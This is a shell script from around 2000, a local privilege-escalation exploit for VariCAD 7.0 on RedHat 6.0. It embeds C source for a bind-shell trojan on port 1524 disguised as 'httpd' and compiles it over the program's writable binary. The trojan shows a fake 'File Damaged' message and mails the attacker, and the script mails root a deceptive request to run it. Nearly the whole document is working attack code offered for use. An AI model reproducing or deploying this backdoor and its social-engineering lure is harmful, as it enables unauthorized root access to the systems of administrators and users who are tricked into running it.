#!/bin/sh
##############################################################################
# VariCAD 7.0 (RedHat 6.0) local exploit by Narrow (narr0w@legion2000.cc)
# 	UNPUBLISHED CODE!!! DON'T DISTRIBUTE!!!!
#
# How this exploits works:
#
# 1) Copy /usr/bin/xvcad/dxfin to /tmp/dxfin.bak
# 2) Run this script
# 3) After running the trojan an email will be sent to narrow@localhost
# 4) Check the last line in the trojan to change the email address
##############################################################################
# Example:
#
# tty2 (narrow): ./xvcad_ex.sh
# tty1 (root): /usr/bin/xvcad/dxfin
# File Damaged! Backup can be found in /tmp/dxfin.bak
# tty2 (narrow): You have new mail in /var/spool/mail/narrow
# tty2 (narrow): telnet localhost 1524
# Trying 127.0.0.1...
# Connected to localhost.
# Escape character is '^]'.
# [root@localhost xvcad 2000]#
#
# Am I good today? :))
##############################################################################

echo "Creating Trojan ..."
cat > _bind.c << EOF
#define PORT 1524
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr; 
int main () {
getlost(); email();
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 
if (soc_des == -1) exit(-1);
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
serv_addr.sin_port = htons(PORT);

soc_rc = bind(soc_des, (struct sockaddr *)&serv_addr, sizeof(serv_addr));
if (soc_rc != 0) exit(-1);
if (fork() != 0) exit(0);

setpgrp();
signal(SIGHUP, SIG_IGN);
if (fork() != 0) exit(0); 

soc_rc = listen(soc_des, 5);
if (soc_rc != 0) exit(0);

while (1) {
soc_len = sizeof(client_addr);
soc_cli = accept(soc_des, (struct sockaddr *) &client_addr,&soc_len);
if (soc_cli < 0) exit(0);
cli_pid = getpid();
server_pid = fork();
if (server_pid != 0) {
	dup2(soc_cli,0);
	dup2(soc_cli,1);
	dup2(soc_cli,2);
	execl("/bin/sh","httpd","-i",(char *)0);
close(soc_cli);
exit(0);
}
close(soc_cli);
}
}

int getlost() {
    printf("File Damaged! Backup can be found in /tmp/dxfin.bak\n\n");
}

int email() {
// Send EMAIL to:
system("echo User `whoami` executed the trojan. | mail narrow@localhost");
}
EOF

echo "Compiling Trojan ..."
gcc -o /usr/bin/xvcad/dxfin _bind.c -w

echo -n "Cleaning..."
rm -f _bind.c
echo "Done!"

echo -n "Fucking up root..."
echo "Could you please check /usr/bin/xvcad/dxfin. After running it I get File Damaged" | mail root
echo "Done!"
#                    www.hack.co.za              [2000]#